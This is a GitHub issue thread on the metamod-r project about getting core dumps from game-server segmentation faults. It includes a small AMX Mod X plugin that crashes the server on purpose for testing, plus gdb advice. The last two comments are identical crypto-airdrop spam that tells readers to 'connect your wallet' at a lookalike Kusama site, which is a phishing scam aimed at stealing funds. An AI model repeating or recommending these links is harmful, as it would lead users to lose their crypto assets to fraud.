### ISSUE TITLE
AGHL.ru died

### ISSUE THREAD

**Issue by Hembi** [theAsmodai/metamod-r#42]
Dear Asmodai,

I find this description: https://github.com/theAsmodai/metamod-r/wiki/Troubbleshouting
I would like to download the "Fit It All" Metamod modul by Lev, because I got on my servers Segmentation Fault error and I would like to configure and test the creating of the core dump files.
Can you upload this module to an other file sharing site?

**Comment by s1lentq** [comment]
you can use this

```
#include <amxmodx>
#include <fakemeta>

public plugin_init()
{
	register_plugin("Crash", "1.0", "dev-cs.ru");

	// Generate exception code 0xC0000005
	set_task(1.0, "GenerateExceptionCode");
}

public GenerateExceptionCode()
{
	server_print("[Crash]: Executed egmentation fault! Exception code: 0xC0000005");

	// Push invalid pointer that will be generate access violation exception
	set_tr2(0xdEADBEEF, TR_InWater, true);
}
```

**Comment by Hembi** [comment]
Thank you silentq.
The server generate properly the core dump and the log.

I would like to ask which gdb commands provide the most detailed crash log?

**Comment by theAsmodai** [comment]
`backtrace`

**Comment by Hembi** [comment]
Hmm and this is enough? Thank you for the answer.
I have a few additional questions then please close this issue, thank you in advance for the answer.

How can this inform about the real problem?
The backtrace command print only these information after crashing the server with the code provided by silentq:
```
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0xf2cd1ecf in ?? () from cstrike/addons/amxmodx/modules/fakemeta_amxx_i386.so
#0  0xf2cd1ecf in ?? () from cstrike/addons/amxmodx/modules/fakemeta_amxx_i386.so
#1  0x00000000 in ?? () 
```

So the server throw a SIGSEGV signal which means the program tried to modify an invalid memory address and the name of the .so file which tried to write to this invalid address.
How can you figure out what exactly caused it?

**Comment by stamepicmorg** [comment]
@Hembi
[fixitall_mm.0.0.zip](https://github.com/theAsmodai/metamod-r/files/2354444/fixitall_mm.0.0.zip)

**Comment by Hembi** [comment]
@stamepicmorg Thank you, I downloaded and used it. I am waiting for a response to my previous question.

**Comment by codelou** [comment]
## Congratulations! You've receive in $2000 on Kusama Airdrop 🪂🔴

Kusama Airdrop: Claim up to $20,000 in Tokens Now!

→ [Earn rewards on connect you wallet](https://kusamanetworks.com/)

→ [Claim Your $KSM Today](https://kusamanetworks.com/)

Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://polkadot.network/static/b118567894df0c230e8553f2d6ea8b83/image2.png)

[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Bonus Now!** [Check Eligibility](https://kusamanetworks.com/)

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your bonus, up to $2,000!
- ✨Magic ✨ [Claim Your Bonus Now!](https://kusamanetworks.com/)

**Comment by codelou** [comment]
## Congratulations! You've receive in $2000 on Kusama Airdrop 🪂🔴

Kusama Airdrop: Claim up to $20,000 in Tokens Now!

→ [Earn rewards on connect you wallet](https://kusamanetworks.com/)

→ [Claim Your $KSM Today](https://kusamanetworks.com/)

Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://polkadot.network/static/b118567894df0c230e8553f2d6ea8b83/image2.png)

[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Bonus Now!** [Check Eligibility](https://kusamanetworks.com/)

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your bonus, up to $2,000!
- ✨Magic ✨ [Claim Your Bonus Now!](https://kusamanetworks.com/)
